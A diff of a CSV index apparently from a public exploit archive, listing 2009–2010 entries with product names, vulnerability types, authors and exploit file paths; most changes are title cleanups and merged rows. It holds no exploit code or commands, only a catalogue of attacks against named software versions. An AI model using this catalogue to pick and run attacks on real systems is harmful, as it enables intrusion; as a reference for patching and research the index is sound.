9804,platforms/windows/dos/9804.rb,"XM Easy Personal FTP Server <= 5.8.0 DoS",2009-11-10,zhangmc,windows,dos,21 9805,platforms/windows/remote/9805.html,"Oracle Document Capture BlackIce DEVMODE exploit",2009-09-29,pyrokinesis,windows,remote,0 9806,platforms/windows/dos/9806.html,"HP LoadRunner 9.5 remote file creation PoC",2009-09-29,pyrokinesis,windows,dos,0 @@ -9216,7 +9216,6 @@ id,file,description,date,author,platform,type,port 9824,platforms/php/webapps/9824.txt,"Swiss Mango CMS - SQL Injection",2009-09-24,kaMtiEz,php,webapps,0 9825,platforms/php/webapps/9825.txt,"e107 0.7.16 Referer header xss",2009-09-24,MustLive,php,webapps,0 9826,platforms/php/webapps/9826.txt,"MindSculpt CMS SQL Injection",2009-09-24,kaMitEz,php,webapps,0 -9827,platforms/multiple/webapps/9827.py,"html2ps 1.0 beta5 file disclosure",2009-09-24,epiphant,multiple,webapps,0 9828,platforms/php/webapps/9828.txt,"OSSIM 2.1 - SQL Injection and xss",2009-09-23,"Alexey Sintsov",php,webapps,0 9829,platforms/multiple/remote/9829.txt,"nginx 0.7.61 - WebDAV Directory Traversal",2009-09-23,kingcope,multiple,remote,80 9830,platforms/php/webapps/9830.txt,"Cour Supreme SQL Injection",2009-09-23,"CrAzY CrAcKeR",php,webapps,0 @@ -9235,7 +9234,6 @@ id,file,description,date,author,platform,type,port 9843,platforms/multiple/remote/9843.txt,"Blender 2.34, 2.35a, 2.4, 2.49b .blend File Command Injection",2009-11-05,"Core Security",multiple,remote,0 9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 - Pipe.c Privelege Escalation",2009-11-05,"Matthew Bergin",linux,local,0 9845,platforms/osx/local/9845.c,"OSX 10.5.6-10.5.7 ptrace mutex DoS",2009-11-05,prdelka,osx,local,0 -9846,platforms/php/webapps/9846.txt,"Endonessia CMS 8.4 Loccal File Inclusion",2009-11-04,s4r4d0,php,webapps,0 9847,platforms/php/webapps/9847.txt,"Portili Personal and Team Wiki <= 1.14 - Multiple Vulnerabilities",2009-11-04,Abysssec,php,webapps,0 9849,platforms/php/webapps/9849.php,"PunBB Extension Attachment <= 1.0.2 - SQL Injection",2009-11-03,puret_t,php,webapps,0 9850,platforms/php/webapps/9850.txt,"Xerox Fiery Webtools SQL Injection",2009-11-03,"Bernardo Trigo",php,webapps,0 @@ -9286,7 +9284,7 @@ id,file,description,date,author,platform,type,port 9902,platforms/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 BoF",2009-10-26,"karak0rsan, murderkey",windows,remote,80 9903,platforms/php/webapps/9903.txt,"OpenDocMan 1.2.5 xss, SQL injection",2009-10-20,"Amol Naik",php,webapps,0 9904,platforms/asp/webapps/9904.txt,"PSArt 1.2 - SQL Injection Vulnerability",2009-10-30,"Securitylab Research",asp,webapps,0 -9905,platforms/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 - 10.2.0.4 AUTH_SESSKEY length validation exploit",2009-10-30,"Dennis Yurichev",windows,remote,1521 +9905,platforms/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 - 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow Vulnerability",2009-10-30,"Dennis Yurichev",windows,remote,1521 9906,platforms/php/webapps/9906.rb,"Mambo 4.6.4 Cache Lite Output Remote File Inclusion",2008-06-14,MC,php,webapps,0 9907,platforms/cgi/webapps/9907.rb,"The Matt Wright guestbook.pl <= 2.3.1 - Server Side Include Vulnerability",1999-11-05,patrick,cgi,webapps,0 9908,platforms/php/webapps/9908.rb,"BASE <= 1.2.4 base_qry_common.php Remote File Inclusion",2008-06-14,MC,php,webapps,0 @@ -9377,7 +9375,6 @@ id,file,description,date,author,platform,type,port 10005,platforms/windows/dos/10005.py,"Windows 7 / Server 2008R2 Remote Kernel Crash",2009-11-11,"laurent gaffie",windows,dos,445 10006,platforms/php/webapps/10006.txt,"DreamPoll 3.1 Vulnerabilities",2009-10-08,"Mark from infosecstuff",php,webapps,0 10007,platforms/windows/remote/10007.html,"EasyMail Objects EMSMTP.DLL 6.0.1 ActiveX Control Remote Buffer Overflow Vulnerability",2009-11-12,"Will Dormann",windows,remote,0 -10008,platforms/windows/remote/10008.txt,"EMC Captiva QuickScan Pro 4.6 sp1 and EMC Documentum ApllicationXtender Desktop 5.4",2009-09-30,pyrokinesis,windows,remote,0 10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing - Multiple Remote Buffer Overflow Vulnerabilities",2009-11-11,"Carsten Eiram",windows,local,0 10010,platforms/windows/local/10010.txt,"Free WMA MP3 Converter 1.1 - (.wav) Local Buffer Overflow",2009-10-09,KriPpLer,windows,local,0 10011,platforms/hardware/remote/10011.txt,"HP LaserJet printers - Multiple Stored XSS Vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80 @@ -9443,7 +9440,6 @@ id,file,description,date,author,platform,type,port 10077,platforms/multiple/dos/10077.txt,"OpenLDAP 2.3.39 MODRDN Remote Denial of Service Vulnerability",2009-11-09,"Ralf Haferkamp",multiple,dos,389 10078,platforms/osx/local/10078.c,"VMWare Fusion <= 2.0.5 vmx86 kext local PoC",2009-10-02,mu-b,osx,local,0 10079,platforms/windows/remote/10079.txt,"Google Apps mailto uri handler cross-browser remote command execution",2009-10-01,pyrokinesis,windows,remote,0 -10080,platforms/windows/remote/10080.txt,"Oracle Network Authentication - Remote Buffer Overflow Vulnerability",2009-11-09,"Dennis Yurichev",windows,remote,1521 10081,platforms/hardware/remote/10081.txt,"Palm Pre WebOS <= 1.1 - Remote File Access Vulnerability",2009-10-05,"Townsend Ladd Harris",hardware,remote,0 10082,platforms/php/webapps/10082.txt,"PBBoard <= 2.0.2 - Full Path Disclosure",2009-10-06,rUnViRuS,php,webapps,0 10083,platforms/php/remote/10083.txt,"PHP <=5.3 - preg_match() full path disclosure",2009-09-27,"David Vieira-Kurz",php,remote,0 @@ -9482,13 +9478,13 @@ id,file,description,date,author,platform,type,port 10168,platforms/php/webapps/10168.txt,"Shoutbox 1.0 HTML / Xss Injection",2009-11-18,SkuLL-HackeR,php,webapps,0 10169,platforms/php/webapps/10169.txt,"phpMyBackupPro - Arbitrary File Download",2009-11-16,"Amol Naik",php,webapps,0 10170,platforms/multiple/webapps/10170.txt,"Xerver 4.31, 4.32 HTTP Response Splitting",2009-11-18,s4squatch,multiple,webapps,80 -10171,platforms/windows/dos/10171.py,"Baby Web Server 2.7.2 Vulnerbility found Denial of Service(0day)",2009-11-18,"Asheesh kumar Mani Tripathi",windows,dos,80 +10171,platforms/windows/dos/10171.py,"Baby Web Server 2.7.2 Vulnerbility found Denial of Service (0day)",2009-11-18,"Asheesh kumar Mani Tripathi",windows,dos,80 10176,platforms/windows/dos/10176.txt,"HP Openview NNM 7.53 Invalid DB Error Code Vulnerability",2009-11-17,"Core Security",windows,dos,0 10177,platforms/php/webapps/10177.txt,"Joomla Ext. iF Portfolio Nexus SQL injection",2009-11-18,"599eme Man",php,webapps,0 10178,platforms/php/webapps/10178.txt,"Joomla / Mambo Component com_ezine 2.1 - Remote File Include Vulnerability",2009-10-20,kaMtiEz,php,webapps,0 10180,platforms/php/webapps/10180.txt,"Simplog 0.9.3.2 - Mutliple Vulnerabilities",2009-11-16,"Amol Naik",php,webapps,0 10181,platforms/php/webapps/10181.txt,"bitrix site manager 4.0.5 - Remote File Inclusion Vulnerability",2005-06-15,"Don Tukulesto",php,webapps,0 -10182,platforms/hardware/dos/10182.py,"2wire Router <= 5.29.52 Remote DoS",2009-10-29,hkm,hardware,dos,0 +10182,platforms/hardware/dos/10182.py,"2wire Router <= 5.29.52 - Remote DoS",2009-10-29,hkm,hardware,dos,0 10183,platforms/php/webapps/10183.php,"Joomla 1.5.12 RCE via TinyMCE - Upload Vulnerability",2009-11-19,daath,php,webapps,80 10184,platforms/linux/dos/10184.txt,"KDE KDELibs 4.3.3 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",linux,dos,0 10185,platforms/bsd/dos/10185.txt,"SeaMonkey 1.1.8 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",bsd,dos,0 @@ -9826,7 +9822,7 @@ id,file,description,date,author,platform,type,port 10592,platforms/php/webapps/10592.txt,"PHPOPENCHAT 3.0.2 Cross Site Scripting AND/OR FPD",2009-12-21,Dedalo,php,webapps,0 10593,platforms/windows/dos/10593.txt,"Winamp <= 5.57 - Stack Overflow",2009-12-22,scriptjunkie,windows,dos,0 10594,platforms/php/webapps/10594.txt,"The Uploader 2.0 - Remote File Upload Vulnerability",2009-12-22,"Master Mind",php,webapps,0 -10595,platforms/windows/local/10595.pl,"CoolPlayer 2.18 M3U Playlist Buffer Overflow Exploit",2009-12-22,data$hack,windows,local,0 +10595,platforms/windows/local/10595.pl,"CoolPlayer 2.18 - M3U Playlist Buffer Overflow Exploit",2009-12-22,data$hack,windows,local,0 10596,platforms/windows/local/10596.pl,"PlayMeNow Malformed (M3U) Universal XP Seh BoF",2009-12-22,"ThE g0bL!N",windows,local,0 10597,platforms/php/webapps/10597.txt,"Active PHP Bookmarks 1.3 - SQL Injection Vulnerability",2009-12-22,Mr.Elgaarh,php,webapps,0 10598,platforms/php/webapps/10598.txt,"deluxebb <= 1.3 - Multiple Vulnerabilities",2009-12-22,"cp77fk4r ",php,webapps,0 @@ -10618,7 +10614,7 @@ id,file,description,date,author,platform,type,port 11614,platforms/php/webapps/11614.txt,"Uploadify Sample Collection Shell Upload Vulnerability",2010-03-02,indoushka,php,webapps,0 11615,platforms/win32/remote/11615.txt,"Internet Explorer 'winhlp32.exe' 'MsgBox()' Remote Code Execution Vulnerability",2010-03-02,"Maurycy Prodeus ",win32,remote,0 11616,platforms/php/webapps/11616.txt,"My Little Forum contact.php SQL Injection",2010-03-02,"Easy Laster",php,webapps,0 -11617,platforms/windows/dos/11617.txt,"Opera + Mozilla Firefox 3.6 - Long String Crash (0day) Exploit",2010-03-02,"Asheesh kumar Mani Tripathi",windows,dos,0 +11617,platforms/windows/dos/11617.txt,"Opera + Mozilla Firefox 3.6 - Long String Crash Exploit (0day)",2010-03-02,"Asheesh kumar Mani Tripathi",windows,dos,0 11618,platforms/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Buffer Overflow Exploit",2010-03-02,"S2 Crew",windows,remote,0 11619,platforms/php/webapps/11619.txt,"Uiga Church Portal index.php SQL Injection",2010-03-02,"Easy Laster",php,webapps,0 11620,platforms/php/webapps/11620.txt,"Dosya Yukle Scrtipi 1.0 - Shell Upload Vulnerability",2010-03-03,indoushka,php,webapps,0 @@ -11467,7 +11463,7 @@ id,file,description,date,author,platform,type,port 12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0 12585,platforms/php/webapps/12585.txt,"4images <= 1.7.7 (image_utils.php) Remote Command Execution Vulnerability",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0 12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection exploit",2010-05-13,Cryptovirus,php,webapps,0 -12587,platforms/linux/remote/12587.c,"wftpd server 3.30 Multiple Vulnerabilities(0day)",2010-05-13,"fl0 fl0w",linux,remote,21 +12587,platforms/linux/remote/12587.c,"wftpd server 3.30 Multiple Vulnerabilities (0day)",2010-05-13,"fl0 fl0w",linux,remote,21 12588,platforms/linux/dos/12588.txt,"Samba Multiple DoS Vulnerabilities",2010-05-13,"laurent gaffie",linux,dos,0 12590,platforms/php/webapps/12590.txt,"Joomla Component com_konsultasi (sid) SQL Injection Vulnerability",2010-05-13,c4uR,php,webapps,0 12591,platforms/php/webapps/12591.txt,"BlaB! Lite <= 0.5 - Remote File Inclusion Vulnerability",2010-05-13,"Sn!pEr.S!Te Hacker",php,webapps,0 @@ -11598,7 +11594,7 @@ id,file,description,date,author,platform,type,port 12735,platforms/php/webapps/12735.txt,"NITRO Web Gallery SQL Injection Vulnerability",2010-05-25,cyberlog,php,webapps,0 12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks, Inc (news.php) SQL Injection Vulnerability",2010-05-25,"Dr.SiLnT HilL",php,webapps,0 12737,platforms/php/webapps/12737.txt,"Simpel Side - (index2.php) SQL Injection Vulnerability",2010-05-25,MN9,php,webapps,0 -12740,platforms/windows/dos/12740.py,"POC - SEH control (0day) of Webby webserver",2010-05-25,m-1-k-3,windows,dos,0 +12740,platforms/windows/dos/12740.py,"Webby Webserver - POC SEH control (0day)",2010-05-25,m-1-k-3,windows,dos,0 12741,platforms/windows/dos/12741.py,"Open&Compact Ftp Server 1.2 Universal Pre-Auth Denial of Service",2010-05-25,Dr_IDE,windows,dos,0 12743,platforms/php/webapps/12743.txt,"web5000 (page_show) SQL Injection Vulnerability",2010-05-25,"BLack Revenge",php,webapps,0 12744,platforms/php/webapps/12744.txt,"Webit Cms SQL Injection Vulnerability",2010-05-25,CoBRa_21,php,webapps,0 @@ -12288,9 +12284,8 @@ id,file,description,date,author,platform,type,port 14001,platforms/multiple/webapps/14001.txt,"InterScan Web Security Virtual Appliance 5.0 - Arbitrary File Download",2010-06-23,"Ivan Huertas",multiple,webapps,0 14002,platforms/freebsd/local/14002.c,"FreeBSD Kernel nfs_mount() Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,local,0 14003,platforms/freebsd/dos/14003.c,"FreeBSD Kernel mountnfs() Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,dos,0 -14004,platforms/multiple/webapps/14004.txt,"InterScan Web Security 5.0 - Arbitrary File Upload",2010-06-23,"Ivan Huertas",multiple,webapps,0 +14004,platforms/multiple/webapps/14004.txt,"InterScan Web Security 5.0 - Arbitrary File Upload & Local Privilege Escalation",2010-06-23,"Ivan Huertas",multiple,webapps,0 14005,platforms/php/webapps/14005.txt,"2daybiz MLM Script SQL Injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 -14006,platforms/multiple/webapps/14006.txt,"InterScan Web Security 5.0 - Local Privilege Escalation",2010-06-23,"Ivan Huertas",multiple,webapps,0 14007,platforms/php/webapps/14007.txt,"Custom Business Card script SQL injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 14008,platforms/php/webapps/14008.txt,"2daybiz matrimonial script SQL injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 14009,platforms/php/webapps/14009.txt,"2daybiz Freelance script SQL injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 @@ -12765,7 +12760,7 @@ id,file,description,date,author,platform,type,port 14597,platforms/windows/dos/14597.py,"Mthree Development MP3 to WAV Decoder Denial of Service Vulnerability",2010-08-10,"Oh Yaw Theng",windows,dos,0 14598,platforms/php/webapps/14598.txt,"Joomla Component Teams Multiple Blind SQL Injection Vulnerabilities",2010-08-10,"Salvatore Fresta",php,webapps,0 14599,platforms/windows/remote/14599.txt,"AoA Audio Extractor Remote ActiveX SEH JIT Spray Exploit (ASLR+DEP Bypass)",2010-08-10,Dr_IDE,windows,remote,0 -14600,platforms/windows/remote/14600.html,"SopCast 3.2.9 - (0Day) Remote Exploit",2010-08-10,sud0,windows,remote,0 +14600,platforms/windows/remote/14600.html,"SopCast 3.2.9 - Remote Exploit (0day)",2010-08-10,sud0,windows,remote,0 14601,platforms/windows/dos/14601.py,"Rosoft media player 4.4.4 SEH buffer overflow PoC",2010-08-10,anonymous,windows,dos,0 14602,platforms/multiple/remote/14602.txt,"Play! Framework <= 1.0.3.1 Directory Transversal Vulnerability",2010-08-10,kripthor,multiple,remote,0 14604,platforms/windows/remote/14604.py,"Easy FTP - BOF Vulnerabilities in NLST , NLST -al, APPE, RETR , SIZE and XCWD Commands",2010-08-10,"Rabih Mohsen",windows,remote,0 @@ -12957,36 +12952,36 @@ id,file,description,date,author,platform,type,port 14849,platforms/php/webapps/14849.py,"mBlogger 1.0.04 (viewpost.php) - SQL Injection Exploit",2010-08-31,"Ptrace Security",php,webapps,0 14851,platforms/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion Vulnerability",2010-09-01,Andre_Corleone,php,webapps,0 14852,platforms/windows/dos/14852.txt,"leadtools activex common dialogs 16.5 - Multiple Vulnerabilities",2010-09-01,LiquidWorm,windows,dos,0 -14853,platforms/windows/remote/14853.py,"MOAUB #1 - Adobe Acrobat Reader and Flash Player “newclass” invalid pointer",2010-09-01,Abysssec,windows,remote,0 -14854,platforms/php/webapps/14854.py,"MOAUB #1 - Cpanel PHP Restriction Bypass Vulnerability 0day",2010-09-01,Abysssec,php,webapps,0 +14853,platforms/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - “newclass” invalid pointer",2010-09-01,Abysssec,windows,remote,0 +14854,platforms/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass Vulnerability (0day)",2010-09-01,Abysssec,php,webapps,0 14856,platforms/windows/remote/14856.txt,"TFTPDWIN 0.4.2 - Directory Traversal Vulnerability",2010-09-01,chr1x,windows,remote,0 14857,platforms/windows/remote/14857.txt,"tftp desktop 2.5 - Directory Traversal vulnerability",2010-09-01,chr1x,windows,remote,0 14858,platforms/windows/dos/14858.txt,"Autodesk MapGuide Viewer ActiveX Denial of Service Vulnerability",2010-09-01,d3b4g,windows,dos,0 14860,platforms/php/webapps/14860.txt,"PHP Joke Site Software (sbjoke_id) SQL Injection Vulnerability",2010-09-01,"BorN To K!LL",php,webapps,0 14866,platforms/novell/dos/14866.txt,"Novell Netware 6.5 - OpenSSH Remote Stack Overflow",2010-09-01,"Francis Provencher",novell,dos,0 14867,platforms/php/webapps/14867.txt,"vbShout 5.2.2 - Remote/Local File Inclusion Vulnerability",2010-09-02,fred777,php,webapps,0 -14869,platforms/windows/dos/14869.py,"MOAUB #2 - Apple QuickTime FlashPix NumberOfTiles Remote Code Execution Vulnerability",2010-09-02,Abysssec,windows,dos,0 -14870,platforms/asp/webapps/14870.txt,"moaub #2 - rainbowportal Multiple Vulnerabilities",2010-09-02,Abysssec,asp,webapps,0 +14869,platforms/windows/dos/14869.py,"Apple QuickTime FlashPix NumberOfTiles - Remote Code Execution Vulnerability",2010-09-02,Abysssec,windows,dos,0 +14870,platforms/asp/webapps/14870.txt,"rainbowportal - Multiple Vulnerabilities",2010-09-02,Abysssec,asp,webapps,0 14873,platforms/win32/shellcode/14873.asm,"Shellcode Checksum Routine",2010-09-02,dijital1,win32,shellcode,0 14875,platforms/multiple/remote/14875.txt,"Accton-based switches (3com, Dell, SMC, Foundry and EdgeCore) - Backdoor Password",2010-09-02,"Edwin Eefting",multiple,remote,0 14876,platforms/php/webapps/14876.txt,"Shop a la Cart Multiple Vulnerabilities",2010-09-02,Ariko-Security,php,webapps,0 14878,platforms/windows/remote/14878.html,"Trend Micro Internet Security Pro 2010 ActiveX extSetOwner Remote Code Execution",2010-09-03,Abysssec,windows,remote,0 -14879,platforms/asp/webapps/14879.txt,"moaub #3 - visinia 1.3 - Multiple Vulnerabilities",2010-09-03,Abysssec,asp,webapps,0 +14879,platforms/asp/webapps/14879.txt,"visinia 1.3 - Multiple Vulnerabilities",2010-09-03,Abysssec,asp,webapps,0 14882,platforms/windows/dos/14882.txt,"FFDshow SEH Exception leading to NULL pointer on Read",2010-09-03,"Matthew Bergin",windows,dos,0 14883,platforms/windows/dos/14883.txt,"Intel Video Codecs 5.0 - Remote Denial of Service Vulnerability",2010-09-03,"Matthew Bergin",windows,dos,0 14884,platforms/php/webapps/14884.txt,"smbind <= 0.4.7 - SQL Injection Vulnerability",2010-09-03,R00t[ATI],php,webapps,0 14885,platforms/windows/remote/14885.html,"Trend Micro Internet Security 2010 ActiveX Remote Exploit (UfPBCtrl.DLL)",2010-11-17,Dr_IDE,windows,remote,0 -14886,platforms/windows/remote/14886.py,"MOAUB #4 - Movie Maker Remote Code Execution (MS10-016)",2010-09-04,Abysssec,windows,remote,0 -14887,platforms/php/webapps/14887.txt,"moaub #4 - syndeocms 2.8.02 - Multiple Vulnerabilities",2010-09-04,Abysssec,php,webapps,0 +14886,platforms/windows/remote/14886.py,"Movie Maker- Remote Code Execution (MS10-016)",2010-09-04,Abysssec,windows,remote,0 +14887,platforms/php/webapps/14887.txt,"syndeocms 2.8.02 - Multiple Vulnerabilities",2010-09-04,Abysssec,php,webapps,0 14890,platforms/php/webapps/14890.py,"mBlogger 1.0.04 (addcomment.php) Persistent XSS Exploit",2010-09-04,"Ptrace Security",php,webapps,0 14891,platforms/php/webapps/14891.txt,"PHP Classifieds ADS (sid) Blind SQL Injection Vulnerability",2010-09-04,"BorN To K!LL",php,webapps,0 14892,platforms/windows/dos/14892.py,"VLC Media Player < 1.1.4 (.xspf) smb:// URI Handling Remote Stack Overflow PoC",2010-09-04,s-dz,windows,dos,0 14893,platforms/php/webapps/14893.txt,"php classifieds 7.3 - Remote File Inclusion Vulnerability",2010-09-04,alsa7r,php,webapps,0 14894,platforms/php/webapps/14894.py,"A-Blog 2.0 - (sources/search.php) SQL Injection Exploit",2010-09-05,"Ptrace Security",php,webapps,0 -14895,platforms/windows/remote/14895.py,"MOAUB #5 - Microsoft MPEG Layer-3 Remote Command Execution Exploit",2010-09-05,Abysssec,windows,remote,0 +14895,platforms/windows/remote/14895.py,"Microsoft MPEG Layer-3 - Remote Command Execution Exploit",2010-09-05,Abysssec,windows,remote,0 14896,platforms/php/webapps/14896.txt,"ijoomla magazine 3.0.1 - Remote File Inclusion Vulnerability",2010-09-05,LoSt.HaCkEr,php,webapps,0 14897,platforms/php/webapps/14897.txt,"chillycms 1.1.3 - Multiple Vulnerabilities",2010-09-05,"AmnPardaz ",php,webapps,0 -14898,platforms/asp/webapps/14898.txt,"moaub #5 - ifnuke Multiple Vulnerabilities 0day",2010-09-05,Abysssec,asp,webapps,0 +14898,platforms/asp/webapps/14898.txt,"ifnuke - Multiple Vulnerabilities (0day)",2010-09-05,Abysssec,asp,webapps,0 14901,platforms/php/webapps/14901.txt,"Joomla Component Clantools 1.5 - Blind SQL Injection Vulnerability",2010-09-05,Solidmedia,php,webapps,0 14902,platforms/php/webapps/14902.txt,"Joomla Component Clantools 1.2.3 - Multiple Blind SQL Injection Vulnerability",2010-09-05,Solidmedia,php,webapps,0 14904,platforms/linux/dos/14904.txt,"FCrackZip 1.0 - Local Buffer Overflow Proof of Concept",2010-09-05,0x6264,linux,dos,0 @@ -12997,14 +12992,14 @@ id,file,description,date,author,platform,type,port 14911,platforms/php/webapps/14911.sh,"Gantry Framework 3.0.10 (Joomla) Blind SQL Injection Exploit",2010-09-05,jdc,php,webapps,0 14913,platforms/asp/webapps/14913.txt,"DMXReady Members Area Manager Persistent XSS Vulnerability",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 14914,platforms/asp/webapps/14914.txt,"Micronetsoft RV Dealer Website SQL Injection Vulnerability",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 -14915,platforms/php/webapps/14915.txt,"moaub #6 - interphoto gallery Multiple Vulnerabilities",2010-09-06,Abysssec,php,webapps,0 -14916,platforms/windows/dos/14916.py,"MOAUB #6 - HP OpenView NNM webappmon.exe execvp_nc Remote Code Execution",2010-09-06,Abysssec,windows,dos,0 +14915,platforms/php/webapps/14915.txt,"interphoto gallery - Multiple Vulnerabilities",2010-09-06,Abysssec,php,webapps,0 +14916,platforms/windows/dos/14916.py,"HP OpenView NNM - webappmon.exe execvp_nc Remote Code Execution",2010-09-06,Abysssec,windows,dos,0 14919,platforms/asp/webapps/14919.txt,"Micronetsoft Rental Property Management Website SQL Injection Vulnerability",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 14922,platforms/php/webapps/14922.txt,"Joomla Component Aardvertiser 2.1 Free Blind SQL Injection Vulnerability",2010-09-06,"Stephan Sattler",php,webapps,0 14923,platforms/php/webapps/14923.txt,"Wordpress Events Manager Extended Plugin Persistent XSS Vulnerability",2010-09-06,Craw,php,webapps,0 14925,platforms/linux/remote/14925.txt,"weborf <= 0.12.2 - Directory Traversal vulnerability",2010-09-07,Rew,linux,remote,0 -14927,platforms/php/webapps/14927.txt,"moaub #7 - dynpage <= 1.0 - Multiple Vulnerabilities (0day)",2010-09-07,Abysssec,php,webapps,0 -14928,platforms/novell/dos/14928.py,"MOAUB #7 - Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflow",2010-09-07,Abysssec,novell,dos,0 +14927,platforms/php/webapps/14927.txt,"dynpage <= 1.0 - Multiple Vulnerabilities (0day)",2010-09-07,Abysssec,php,webapps,0 +14928,platforms/novell/dos/14928.py,"Novell Netware - NWFTPD RMD/RNFR/DELE Argument Parsing Buffer Overflow",2010-09-07,Abysssec,novell,dos,0 14931,platforms/php/webapps/14931.php,"java Bridge 5.5 - Directory Traversal vulnerability",2010-09-07,Saxtor,php,webapps,0 14932,platforms/windows/webapps/14932.py,"ColdCalendar 2.06 SQL Injection Exploit",2010-09-07,mr_me,windows,webapps,0 14933,platforms/windows/webapps/14933.txt,"ColdBookmarks 1.22 SQL Injection Vulnerability",2010-09-07,mr_me,windows,webapps,0 @@ -13014,88 +13009,88 @@ id,file,description,date,author,platform,type,port 14938,platforms/windows/dos/14938.txt,"Internet Download Accelerator 5.8 - Remote Buffer Overflow PoC",2010-09-07,eidelweiss,windows,dos,0 14941,platforms/win32/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow Exploit",2010-09-07,"Lincoln, Nullthreat, rick2600",win32,remote,80 14942,platforms/php/webapps/14942.txt,"1024 CMS 2.1.1 - Blind SQL Injection Vulnerability",2010-09-07,"Stephan Sattler",php,webapps,0 -14943,platforms/asp/webapps/14943.txt,"moaub #8 - sirang web-based d-control Multiple Vulnerabilities",2010-09-08,Abysssec,asp,webapps,0 -14944,platforms/windows/local/14944.py,"MOAUB #8 - Microsoft Office Visio DXF File Stack based Overflow",2010-09-08,Abysssec,windows,local,0 +14943,platforms/asp/webapps/14943.txt,"sirang web-based d-control Multiple Vulnerabilities",2010-09-08,Abysssec,asp,webapps,0 +14944,platforms/windows/local/14944.py,"Microsoft Office Visio DXF File Stack based Overflow",2010-09-08,Abysssec,windows,local,0 14947,platforms/bsd/dos/14947.txt,"FreeBSD 8.1/7.3 vm.pmap Kernel Local Race Condition",2010-09-08,"Maksymilian Arciemowicz",bsd,dos,0 -14948,platforms/php/webapps/14948.txt,"moaub #9 - festos cms 2.3b Multiple Vulnerabilities",2010-09-09,Abysssec,php,webapps,0 -14949,platforms/windows/dos/14949.py,"MOAUB #9 - Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability",2010-09-09,Abysssec,windows,dos,0 +14948,platforms/php/webapps/14948.txt,"festos cms 2.3b Multiple Vulnerabilities",2010-09-09,Abysssec,php,webapps,0 +14949,platforms/windows/dos/14949.py,"Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability",2010-09-09,Abysssec,windows,dos,0 14952,platforms/php/webapps/14952.txt,"Visitors Google Map Lite 1.0.1 (FREE) module mod_visitorsgooglemap SQL Injection",2010-09-09,"Chip d3 bi0s",php,webapps,0 -14954,platforms/asp/webapps/14954.txt,"moaub #10 - aradblog Multiple Vulnerabilities",2010-09-09,Abysssec,asp,webapps,0 +14954,platforms/asp/webapps/14954.txt,"aradblog - Multiple Vulnerabilities",2010-09-09,Abysssec,asp,webapps,0 14959,platforms/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 Extended M3U directives SEH",2010-09-09,"Carlos Mario Penagos Hollmann",windows,local,0 14960,platforms/php/webapps/14960.txt,"ES Simple Download 1.0. Local File Inclusion Vulnerability",2010-09-09,Kazza,php,webapps,0 14961,platforms/win32/local/14961.py,"Audiotran 1.4.2.4 SEH Overflow Exploit",2010-09-09,"Abhishek Lyall",win32,local,0 14962,platforms/multiple/webapps/14962.txt,"CS Cart 1.3.3 - (install.php) Cross Site Scripting Vulnerability",2010-09-09,crmpays,multiple,webapps,80 14964,platforms/php/webapps/14964.txt,"Joomla Component (com_jphone) Local File Inclusion Vulnerability",2010-09-10,"Chip d3 bi0s",php,webapps,0 14965,platforms/php/webapps/14965.txt,"fcms 2.2.3 - Remote File Inclusion Vulnerability",2010-09-10,LoSt.HaCkEr,php,webapps,0 -14966,platforms/windows/local/14966.py,"MOAUB #10 - Excel RTD Memory Corruption",2010-09-10,Abysssec,windows,local,0 +14966,platforms/windows/local/14966.py,"Excel RTD - Memory Corruption",2010-09-10,Abysssec,windows,local,0 14967,platforms/windows/dos/14967.txt,"Webkit (Apple Safari < 4.1.2/5.0.2 & Google Chrome < 5.0.375.125) - Memory Corruption",2010-09-10,"Jose A. Vazquez",windows,dos,0 14968,platforms/php/webapps/14968.txt,"symphony 2.0.7 - Multiple Vulnerabilities",2010-09-10,JosS,php,webapps,0 -14969,platforms/asp/webapps/14969.txt,"MOAUB #11 - ASP Nuke SQL Injection Vulnerability",2010-09-11,Abysssec,asp,webapps,0 -14971,platforms/windows/dos/14971.py,"MOAUB #11 - Microsoft Office Word 2007 sprmCMajority Buffer Overflow",2010-09-11,Abysssec,windows,dos,0 +14969,platforms/asp/webapps/14969.txt,"ASP Nuke - SQL Injection Vulnerability",2010-09-11,Abysssec,asp,webapps,0 +14971,platforms/windows/dos/14971.py,"Microsoft Office Word 2007 - sprmCMajority Buffer Overflow",2010-09-11,Abysssec,windows,dos,0 14973,platforms/php/webapps/14973.txt,"piwigo-2.1.2 - Multiple Vulnerabilities",2010-09-11,Sweet,php,webapps,0 14974,platforms/windows/dos/14974.txt,"HP Data Protector Media Operations 6.11 Multiple Modules NULL Pointer Dereference DoS",2010-09-11,d0lc3,windows,dos,0 14976,platforms/linux/remote/14976.txt,"YOPS Web Server Remote Command Execution",2010-09-11,"Rodrigo Escobar",linux,remote,0 